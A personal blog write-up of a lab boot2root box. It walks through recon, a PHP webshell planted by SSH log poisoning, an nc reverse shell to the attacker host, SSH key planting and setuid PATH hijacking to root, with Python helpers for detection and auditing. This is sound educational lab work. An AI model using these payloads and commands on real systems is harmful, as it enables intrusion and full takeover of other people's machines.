Off-topic:
I was a miserable high-school senior, but I've graduated now, and I'm going to study the cybersecurity I've always dreamed of at university. Life is good.
I first got into security in my second year of middle school, but I've always been a half-baked amateur. I originally wanted to do a simple boot2root series, but school ate a whole year in which I didn't touch any of it, and I've forgotten most of it... there was no way I could learn security under that kind of cramming bombardment anyway. I meant to study over the break, but ended up gaming with classmates until I nearly had a brain hemorrhage (figuratively!). Recently I came across a game called Hacknet, remembered watching yuppt (I think?) play it on Bilibili, and remembered mocking how simple it made intrusion look, like taking 2023's msf back to 2008. Then it hit me: back then I was attacking boxes on a machine with 4 GB of RAM and an i5, and I can't let that passion stay buried! So first I'll sort out the material I already have, learn to write blog posts, and recover my skills at the same time.
I think I still remember code auditing reasonably well; it's mostly the basic Linux commands I've forgotten. I went through the same thing in my last year of middle school, so no big deal; nothing here needs very complicated commands anyway, and for shell scripts I'll ask GPT for now...
(This is material from a box I did quite a while ago... luckily I had a bit of a show-off streak back then and wrote down every step clearly with full screenshots.)
Once I've got it all back I'd like to stream boot2root boxes live on Bilibili.
(That shouldn't count as "spreading hacking techniques", right? Let's find out!)
Enough said. The next few posts may not be top quality and won't be able to point out every pain point, mainly because I don't remember them myself (lol).
I'll go back and read the manuals for the techniques used here; if anything gets updated I'll say so.

1. Information gathering
You absolutely must know nmap!
nmap is a port scanner and service/OS fingerprinting tool and it's excellent, but it also announces itself. The port scan itself carries no User-Agent at all (it's raw TCP and ICMP), but the moment you enable the NSE scripts (-sC, or -A which includes them), the HTTP probes go out with nmap's own User-Agent, which literally names the Nmap Scripting Engine, and the SSH probes do the same in their version banner (you'll see "NmapNSE" sitting in the target's auth.log later in this very writeup). Identifying your tool honestly is good manners (do the same when you write your own scanners!), but it is also exactly what an IDS/WAF signature matches on, so hosts that inspect traffic (our enemy, the firewall) will flag or drop it. On a boot2root box you don't need to bother, but against anything more realistic, give the HTTP scripts a normal browser User-Agent; nmap's http library reads it from the http.useragent script argument.
You can find your own User-Agent in the browser: open the developer tools, go to the Network tab, and look at the request headers of any request.
It will contain something like
User-Agent:
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
Copy that and use it as the header value.
nmap -sT -sC -sV -O -A -p22,80 192.168.56.110 -oN nmap_details.txt
(-A already implies -sC -sV -O, so the extra flags are redundant but harmless. -oN is the normal-output flag; bare -o is not a valid output option. The scan is restricted to ports 22 and 80.)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 6afed61723cb90792bb12d3753974658 (RSA)
|   256  5bc468d18959d748b096f311871c08ac (ECDSA)
|_  256  613966881d8ff1d040611e99c51a1ff4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
| http-robots.txt: 1 disallowed entry
|_/eventadmins
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:5E:7E:83 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 - 5.3 (99%), Linux 2.6.32 (96%), Linux 3.2 - 4.9 (96%), Netgear ReadyNAS 2100 (RAIDiator 4.2.24) (96%), Linux 2.6.32 - 3.10 (96%), Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Sony X75CH-series Android TV (Android 5.0) (95%), Linux 3.1 (95%), Linux 3.2 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
(The OSScan warning is a direct consequence of -p22,80: both ports are open, and OS detection wants at least one open and one closed port to compare responses, so the guesses above are low-confidence. Including a closed port, or dropping -p, fixes it.)
gobuster dir -u http://192.168.56.110 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php
/index.html (Status: 200) [Size: 1373]
/.php (Status: 403) [Size: 279]
/privacy (Status: 301) [Size: 318] [--> http://192.168.56.110/privacy/]
/.html (Status: 403) [Size: 279]
/robots.txt (Status: 200) [Size: 37]
/tickets.html (Status: 200) [Size: 347]
/drupal (Status: 301) [Size: 317] [--> http://192.168.56.110/drupal/]
/secret (Status: 301) [Size: 317] [--> http://192.168.56.110/secret/]
/Makefile (Status: 200) [Size: 11]
/wp-admin (Status: 301) [Size: 319] [--> http://192.168.56.110/wp-admin/]
/phpmyadmin (Status: 301) [Size: 321] [--> http://192.168.56.110/phpmyadmin/]
gobuster runs a lot of threads and is very fast, so machines with traffic controls will simply ban your IP. If you have the money you can build an IP pool and brute-force through it, but you can also lower the thread count (-t), add a --delay between requests and set a browser User-Agent with -a; it'll be slow, but it'll finish. On a boot2root box you basically don't need any of this, but if the scan stalls or you get dropped it's usually one of two things: either the target has firewall rules, or your own machine/network can't keep up with the load you're pushing...
2. Web exploitation
Some sensitive paths are exposed. Grab them directly; curl works, so does just opening them in the browser.
http://192.168.56.110/robots.txt:
User-agent: *
Disallow: /eventadmins
http://192.168.56.110/eventadmins/:
man there's a problem with ssh
john said "it's poisonous!!! stay away!!!"
idk if he's mentally challenged
please find and fix it
also check /littlequeenofspades.html
your buddy, buddy
curl -i -L http://192.168.56.110/littlequeenofspades.html
HTTP/1.1 200 OK
Date: Fri, 28 Jul 2023 05:17:21 GMT
Server: Apache/2.4.38 (Debian)
Last-Modified: Mon, 04 Jan 2021 11:56:32 GMT
ETag: "522-5b811c7f17c00"
Accept-Ranges: bytes
Content-Length: 1314
Vary: Accept-Encoding
Content-Type: text/html
<!DOCTYPE html>
<html>
<body>
<p>Now, she is a little queen of spades, and the men will not let her be </p>
<p>Mmmm, she is the little queen of spades, and the men will not let her be </p>
<p>Everytime she makes a spread, hoo fair brown, cold chill just runs all over me </p>
<p>I'm gon' get me a gamblin' woman, if the last thing that I do </p>
<p>Eee, gon' get me a gamblin' woman, if it's the last thing that I do </p>
<p>Well, a man don't need a woman, ooh fair brown, that he got to give all his money to </p>
<p>Everybody say she got a mojo, now she's been usin' that stuff </p>
<p>Mmmm, mmmm, 'verybody says she got a mojo, 'cause she been usin' that stuff </p>
<p>But she got a way trimmin' down, hoo fair brown, and I mean it's most too tough </p>
<p>Now, little girl, since I am the king, baby, and you is a queen </p>
<p>Ooo eee, since I am the king baby, and you is a queen </p>
<p>Le's us put our heads together, hoo fair brown, then we can make our money green </p>
<p style="color:white">aW50cnVkZXI/IEwyRmtiV2x1YzJacGVHbDBMbkJvY0E9PQ==</p>
</html>
There's a familiar-looking base64 string hidden at the bottom: color:white on a white page, invisible in the browser but plain as day in curl's output. Just decode it!
echo 'aW50cnVkZXI/IEwyRmtiV2x1YzJacGVHbDBMbkJvY0E9PQ==' | base64 -d
Another base64 string?
intruder? L2FkbWluc2ZpeGl0LnBocA==
echo 'L2FkbWluc2ZpeGl0LnBocA==' | base64 -d
/adminsfixit.php
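As an added example (my own, not part of the original notes), here is a small Python script that does the two things this step did by hand: pull the text out of elements whose inline style makes them invisible (color:white, display:none and friends), and peel nested base64 layer by layer until the result stops looking like base64. The HTML sample is the page's littlequeenofspades.html trimmed to two lines with the real hidden paragraph kept verbatim; the class and function names are my own.

```python
import base64
import re
from html.parser import HTMLParser

# A run of base64 alphabet, 16+ chars, optional '=' padding. Short words are
# ignored so ordinary prose is not mistaken for an encoded blob.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

# Inline styles that hide text from a human reader but not from curl.
HIDING_STYLES = ("color:white", "color:#fff", "display:none", "visibility:hidden")


class HiddenTextParser(HTMLParser):
    """Collect the text of elements whose inline style makes them invisible."""

    def __init__(self):
        super().__init__()
        self._hidden_tag = None
        self.hidden = []

    def handle_starttag(self, tag, attrs):
        style = (dict(attrs).get("style") or "").replace(" ", "").lower()
        if any(h in style for h in HIDING_STYLES):
            self._hidden_tag = tag

    def handle_endtag(self, tag):
        if tag == self._hidden_tag:
            self._hidden_tag = None

    def handle_data(self, data):
        if self._hidden_tag and data.strip():
            self.hidden.append(data.strip())


def hidden_text(html):
    """Return the strings that are visible to curl but invisible to a human."""
    parser = HiddenTextParser()
    parser.feed(html)
    return parser.hidden


def peel_base64(text, max_depth=8):
    """Decode every base64 token in `text`, then recurse into the result.
    Returns one string per layer, outermost first; stops when nothing in the
    current layer decodes to printable UTF-8 (so '/adminsfixit.php' ends it)."""
    layers = []
    current = text
    for _ in range(max_depth):
        decoded = []
        for token in B64_TOKEN.findall(current):
            try:
                text_out = base64.b64decode(token, validate=True).decode("utf-8")
            except (ValueError, UnicodeDecodeError):
                continue  # looked like base64, wasn't (or decoded to binary)
            if text_out.isprintable():
                decoded.append(text_out)
        if not decoded:
            break
        current = " ".join(decoded)
        layers.append(current)
    return layers


def find_hidden_paths(html):
    """Map each hidden blob in the page to its decoded layers."""
    return {blob: peel_base64(blob) for blob in hidden_text(html)}


# Constructed sample: the page's littlequeenofspades.html trimmed to two
# paragraphs, with the real hidden <p> kept verbatim.
SAMPLE_HTML = """<!DOCTYPE html>
<html><body>
<p>Now, she is a little queen of spades, and the men will not let her be </p>
<p style="color:white">aW50cnVkZXI/IEwyRmtiV2x1YzJacGVHbDBMbkJvY0E9PQ==</p>
</body></html>"""

if __name__ == "__main__":
    for blob, layers in find_hidden_paths(SAMPLE_HTML).items():
        print(blob)
        for depth, layer in enumerate(layers, 1):
            print(f"  layer {depth}: {layer}")
```

The 16-character minimum and the printable-UTF-8 check are what keep the recursion from chasing ordinary words; a binary payload (a gzip blob, say) would stop it too, so if a layer decodes to bytes rather than text, save it to a file instead.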
curl -i -L http://192.168.56.110/adminsfixit.php
<!DOCTYPE html>
<html>
<body>
<p>#######################################################################</p>
<p>ssh auth log</p>
<p>============</p>
<p>i hope some wacky and uncharacteristic thing would not happen</p>
<p>this job is fucking poisonous and im boutta planck length away from quitting this hoe</p>
<p>-abuzer komurcu</p>
<p>#######################################################################</p>
<p> </p>
<p> </p>
</html>
Jul 28 00:04:59 driftingblues sshd[523]: Server listening on 0.0.0.0 port 22.
Jul 28 00:05:02 driftingblues CRON[534]: pam_unix(cron:session): session opened for user root by (uid=0)
Jul 28 00:05:02 driftingblues CRON[534]: pam_unix(cron:session): session closed for user root
Jul 28 00:06:01 driftingblues CRON[745]: pam_unix(cron:session): session opened for user root by (uid=0)
Jul 28 00:06:01 driftingblues CRON[745]: pam_unix(cron:session): session closed for user root
Jul 28 00:07:01 driftingblues CRON[749]: pam_unix(cron:session): session opened for user root by (uid=0)
Jul 28 00:07:01 driftingblues CRON[749]: pam_unix(cron:session): session closed for user root
Jul 28 00:07:14 driftingblues sshd[753]: Did not receive identification string from 192.168.56.102 port 60094
Jul 28 00:07:35 driftingblues sshd[755]: Did not receive identification string from 192.168.56.102 port 39646
Jul 28 00:07:44 driftingblues sshd[756]: Protocol major versions differ for 192.168.56.102 port 45130: SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2 vs. SSH-1.5-NmapNSE_1.0
Jul 28 00:07:44 driftingblues sshd[757]: Protocol major versions differ for 192.168.56.102 port 45136: SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2 vs. SSH-1.5-Nmap-SSH1-Hostkey
Jul 28 00:07:44 driftingblues sshd[759]: Unable to negotiate with 192.168.56.102 port 45146: no matching host key type found. Their offer: ssh-dss [preauth]
Jul 28 00:07:44 driftingblues sshd[761]: Connection closed by 192.168.56.102 port 45150 [preauth]
Jul 28 00:07:44 driftingblues sshd[763]: Connection closed by 192.168.56.102 port 45154 [preauth]
Jul 28 00:07:44 driftingblues sshd[765]: Unable to negotiate with 192.168.56.102 port 45162: no matching host key type found. Their offer: ecdsa-sha2-nistp384 [preauth]
Jul 28 00:07:44 driftingblues sshd[767]: Unable to negotiate with 192.168.56.102 port 45166: no matching host key type found. Their offer: ecdsa-sha2-nistp521 [preauth]
So adminsfixit.php is a PHP script that reads the SSH auth log (/var/log/auth.log). Hit it a few times and you'll see the content change as sshd logs more. Look at what's already in there, too: our own nmap scan from 192.168.56.102 left "SSH-1.5-NmapNSE_1.0" and "SSH-1.5-Nmap-SSH1-Hostkey" in the target's log. That's the tool-fingerprinting problem from section 1 again, this time in the SSH version banner rather than an HTTP User-Agent.
Think log poisoning: sshd writes a failed login's username into auth.log verbatim, and since the page evidently evaluates the file as PHP rather than just printing it (the command below only works if it does), whatever PHP we put in the username runs on every page load. One caveat: you get one shot per log file, because a payload with a syntax error stays in the log and breaks the page for every later request.
ssh '<?php system($_GET["cmd"]); ?>'@192.168.56.110
(Double quotes around cmd so the outer single quotes aren't broken. The login itself will fail, and that's fine: the "Invalid user" line sshd writes is what we wanted. Type anything at the password prompt or just Ctrl-C.)
Check whether the injection worked (quote the URL so the shell doesn't treat the ? as a glob):
curl -i -L 'http://192.168.56.110/adminsfixit.php?cmd=ls'
Makefile
adminsfixit.php
cr.png
drupal
eventadmins
index.html
littlequeenofspades.html
phpmyadmin
privacy
robots.txt
secret
tickets.html
wp-admin
Injection successful!!!
First, listen on kali with nc -lvnp 6666:
nc -lvnp 6666
Then in the browser open http://192.168.56.110/adminsfixit.php?cmd=nc 192.168.56.102 6666 -e /bin/bash (the browser percent-encodes the spaces for you; with curl you'd quote the URL and encode them yourself, %20 for a space). Note that -e only exists in netcat-traditional; it worked here, so the target's nc has it, but the OpenBSD-flavoured nc on many systems doesn't, and you'd need a different reverse-shell one-liner.
Got a shell back!
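An added example, not from the original writeup, looking at this step from both sides: a Python detector that runs over sshd auth.log lines and flags "Invalid user" entries whose username contains PHP tags or a code-execution call (the trace that log poisoning leaves), a helper that percent-encodes the cmd parameter so the reverse-shell command survives curl, and the non-vulnerable way to put a log on a web page (escape it as data instead of including it as code). The first four sample log lines are from the page's adminsfixit.php output; the last two are constructed by me, the poisoned one being what sshd writes for the ssh command above, assuming it logs the username as-is.

```python
import html
import re
from urllib.parse import quote

# sshd's "Invalid user" line: the attempted username is written verbatim
# between "Invalid user " and " from <ip> port <n>".
SSHD_INVALID_USER = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[\d+\]: "
    r"Invalid user (?P<user>.*) from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)
PHP_TAG = re.compile(r"<\?(?:php|=)|\?>", re.IGNORECASE)
CODE_EXEC = re.compile(
    r"\b(?:system|exec|passthru|shell_exec|popen|proc_open|eval)\s*\(", re.IGNORECASE
)


def poisoned_entries(lines):
    """Return (line_no, source_ip, username) for each 'Invalid user' entry whose
    username carries PHP tags or a code-execution call. A web page that
    include()s this log would run that username as PHP."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = SSHD_INVALID_USER.match(line)
        if not m:
            continue
        user = m.group("user")
        if PHP_TAG.search(user) or CODE_EXEC.search(user):
            hits.append((n, m.group("ip"), user))
    return hits


def webshell_url(base, cmd, param="cmd"):
    """Build the URL that drives the injected webshell. Spaces and slashes are
    percent-encoded (safe="" encodes '/' too), so the command reaches $_GET
    intact whether sent by curl or by a browser."""
    return f"{base}?{param}={quote(cmd, safe='')}"


def render_log_as_text(lines):
    """The safe way to show a log on a web page: HTML-escape it and emit it as
    data inside <pre>, never include() it as code."""
    return "<pre>\n" + "\n".join(html.escape(line) for line in lines) + "\n</pre>"


# Sample auth.log: first four lines from the page's adminsfixit.php output,
# last two constructed (a harmless failed login, then the poisoned entry).
SAMPLE_AUTH_LOG = """\
Jul 28 00:04:59 driftingblues sshd[523]: Server listening on 0.0.0.0 port 22.
Jul 28 00:07:14 driftingblues sshd[753]: Did not receive identification string from 192.168.56.102 port 60094
Jul 28 00:07:44 driftingblues sshd[756]: Protocol major versions differ for 192.168.56.102 port 45130: SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2 vs. SSH-1.5-NmapNSE_1.0
Jul 28 00:07:44 driftingblues sshd[759]: Unable to negotiate with 192.168.56.102 port 45146: no matching host key type found. Their offer: ssh-dss [preauth]
Jul 28 00:11:02 driftingblues sshd[801]: Invalid user admin from 192.168.56.102 port 45180
Jul 28 00:12:03 driftingblues sshd[812]: Invalid user <?php system($_GET["cmd"]); ?> from 192.168.56.102 port 45200
""".splitlines()

if __name__ == "__main__":
    for n, ip, user in poisoned_entries(SAMPLE_AUTH_LOG):
        print(f"line {n}: log poisoning from {ip}: {user!r}")
    print(webshell_url("http://192.168.56.110/adminsfixit.php",
                       "nc 192.168.56.102 6666 -e /bin/bash"))
```

On the defensive side the same rule is cheap to run from a SIEM: an "Invalid user" whose name contains "<?" is never a typo. The PHP fix is the same idea as render_log_as_text: readfile() plus htmlspecialchars(), not include().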
3. Privilege escalation
cd /home
ls -liah
total 16K
129281 drwxr-xr-x 3 robertj robertj 4.0K Jan  4  2021 .
     2 drwxr-xr-x 3 root    root    4.0K Jan  4  2021 ..
129286 drwx---rwx 2 robertj robertj 4.0K Jul 28 00:40 .ssh
129282 -r-x------ 1 robertj robertj 1.8K Jan  3  2021 user.txt
There's a .ssh directory, and its mode is drwx---rwx: world-writable (the "other" bits are rwx). user.txt is -r-x------, readable only by robertj, so we can't read the first flag as www-data yet.
$ cd .ssh
It's empty and we can write to it, so drop our own public key in as authorized_keys and move laterally over SSH from www-data to robertj. Caveat: a default sshd (StrictModes yes) refuses an authorized_keys whose directory is group/world-writable or whose owner isn't the user, and the file wget creates below is owned by www-data; it worked on this box, so its sshd must be configured leniently (the page doesn't show sshd_config), but don't count on that elsewhere.
ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in id_rsa
Your public key has been saved in id_rsa.pub
The key fingerprint is:
SHA256:ZrHlxLfxQyREdqGeX/9FKVqqVqqkZQAxRCNLmYyhp0Y root@kali
The key's randomart image is: (RSA 3072 randomart omitted)
mv id_rsa.pub authorized_keys
python -m http.server 80    (on the attacker box, 192.168.56.102, in the directory holding authorized_keys)
www-data@driftingblues:/home/robertj/.ssh$ wget http://192.168.56.102/authorized_keys
ssh robertj@192.168.56.110 -i id_rsa    (back on kali, with the private key ssh-keygen just wrote)
Linux driftingblues 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
robertj@driftingblues:~$
Logged in~~~~
Now look for privileged files: anything with the setuid bit runs as its owner, not as us.
robertj@driftingblues:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/passwd
/usr/bin/getinfo
/usr/bin/mount
/usr/bin/chfn
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/su
/usr/bin/gpasswd
/usr/bin/chsh
robertj@driftingblues:~$ getinfo
###################
ip address
###################
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
link/ether 08:00:27:5e:7e:83 brd ff:ff:ff:ff:ff:ff
inet 192.168.56.110/24 brd 192.168.56.255 scope global dynamic enp0s3
valid_lft 491sec preferred_lft 491sec
inet6 fe80::a00:27ff:fe5e:7e83/64 scope link
valid_lft forever preferred_lft forever
###################
hosts
###################
127.0.0.1 localhost
127.0.1.1 driftingblues
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
###################
os info
###################
Linux driftingblues 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 GNU/Linux
robertj@driftingblues:~$ ls -liah /usr/bin/getinfo
31095 -r-sr-s--- 1 root operators 17K Jan  4  2021 /usr/bin/getinfo
Setuid root and setgid operators, and only the operators group may execute it at all (no "other" bits); robertj is in operators, as the id output further down confirms.
robertj@driftingblues:~$ cat /usr/bin/getinfo
(Don't do this with cat; the binary garbage fills the terminal. Run strings on it instead. The readable strings in the output were:)
setuid puts system __cxa_finalize __libc_start_main libc.so.6 GLIBC_2.2.5
###################
ip address          <- important!!!!!!!!
###################
ip a
###################
hosts
###################
cat /etc/hosts
###################
os info
###################
uname -a
GCC: (Debian 9.3.0-19) 9.3.0
From the strings you can see it runs ip a, cat /etc/hosts and uname -a through system(), every one of them by bare name rather than absolute path, and it imports setuid(), so it switches to root before running them.
Consider path hijacking.
(Prepend /tmp to PATH first: export PATH=/tmp:$PATH. My notes skipped that line, but without it a bare "ip" still resolves to the system binary and nothing happens.)
robertj@driftingblues:/tmp$ touch /tmp/ip
robertj@driftingblues:/tmp$ echo '/bin/bash -p' > /tmp/ip
robertj@driftingblues:/tmp$ chmod +x /tmp/ip
robertj@driftingblues:/tmp$ getinfo
###################
ip address
###################
root@driftingblues:/tmp# id
uid=0(root) gid=1000(robertj) groups=1000(robertj),1001(operators)
Root! The real uid is 0, which confirms the setuid(0) call; bash -p only matters when just the effective uid is elevated, but it's a safe habit. The gid is still robertj's and the groups still include operators, which is why we were allowed to run getinfo in the first place.
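An added example (my own, not the page's code) that generalises the check I did by eyeballing cat output: a Python audit that lists setuid files the way find -perm -u=s does, extracts printable strings from a binary, and reports every command string that names a program without a path, i.e. a PATH-hijack candidate. It also shows the PATH resolution itself: a writable directory prepended to PATH wins over the system binary. The byte blob below is constructed to mimic getinfo's strings; the function names and the "known" command set are my own assumptions.

```python
import os
import re
import shutil
import stat
import tempfile

# A command string as system() would get it: program name, whitespace, at
# least one argument. "ip a", "cat /etc/hosts" and "uname -a" all match.
COMMAND_LINE = re.compile(r"^(?P<prog>[A-Za-z0-9_./+-]+)\s+\S")


def extract_strings(data, min_len=4):
    """Pure-Python `strings`: runs of printable ASCII at least min_len long."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]


def hijackable_commands(strings, known=None):
    """Programs that some string in the binary invokes by bare name, in order of
    first appearance. A bare name is resolved through the caller's PATH, which
    a setuid binary inherits from the unprivileged user running it.
    `known` restricts candidates to real command names; by default a name
    counts if it resolves on this host's PATH."""
    found = []
    for s in strings:
        m = COMMAND_LINE.match(s.strip())
        if not m:
            continue
        prog = m.group("prog")
        if "/" in prog:
            continue  # absolute path (or explicit ./relative): not PATH-resolved
        exists = prog in known if known is not None else shutil.which(prog) is not None
        if exists and prog not in found:
            found.append(prog)
    return found


def find_suid(root="/"):
    """Equivalent of `find / -perm -u=s -type f 2>/dev/null`."""
    hits = []
    for dirpath, _dirs, files in os.walk(root, onerror=lambda _e: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return hits


def audit_binary(path, known=None):
    """Read one binary and report its PATH-hijackable command names."""
    with open(path, "rb") as f:
        return hijackable_commands(extract_strings(f.read()), known)


def resolve_on_path(prog, path_env):
    """How /bin/sh (and therefore system()) finds a bare program name: the
    first executable of that name in PATH order wins."""
    for d in path_env.split(os.pathsep):
        candidate = os.path.join(d or ".", prog)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def simulate_hijack(prog="ip"):
    """Drop a fake `prog` into a writable directory and prepend it to PATH, as
    /tmp/ip was above. Returns True when the fake wins the lookup."""
    system_path = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
    with tempfile.TemporaryDirectory() as tmp:
        fake = os.path.join(tmp, prog)
        with open(fake, "w") as f:
            f.write("#!/bin/sh\n/bin/bash -p\n")
        os.chmod(fake, 0o755)
        return resolve_on_path(prog, tmp + os.pathsep + system_path) == fake


# Constructed stand-in for /usr/bin/getinfo: the symbol names and command
# strings seen in the cat output above, NUL-separated like a real ELF.
SAMPLE_GETINFO = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 9
    + b"setuid\x00puts\x00system\x00__libc_start_main\x00libc.so.6\x00"
    + b"###################\x00ip address\x00ip a\x00hosts\x00cat /etc/hosts\x00"
    + b"os info\x00uname -a\x00GCC: (Debian 9.3.0-19) 9.3.0\x00"
)
# The same program written safely: absolute paths, nothing for PATH to decide.
HARDENED_STRINGS = ["/usr/sbin/ip a", "/usr/bin/cat /etc/hosts", "/usr/bin/uname -a"]

if __name__ == "__main__":
    print("getinfo-like sample:", hijackable_commands(extract_strings(SAMPLE_GETINFO), {"ip", "cat", "uname"}))
    print("hardened:", hijackable_commands(HARDENED_STRINGS, {"ip", "cat", "uname"}))
    print("fake ip wins PATH lookup:", simulate_hijack())
    for path in find_suid("/usr/bin"):  # narrowed to /usr/bin for a quick demo
        print(path, audit_binary(path))
```

The heuristic is deliberately loose (any "word argument" string is a candidate), so treat its output as a list of things to confirm with ltrace or by reading the disassembly, not as proof. The fix for a program like getinfo is the one HARDENED_STRINGS shows: absolute paths, or better, no system() at all and a hard-coded PATH set before anything is executed.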
root@driftingblues:/root# cat root.txt
flag 2/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░▐▌░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░█▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█
congratulations!
OK! That's this box done!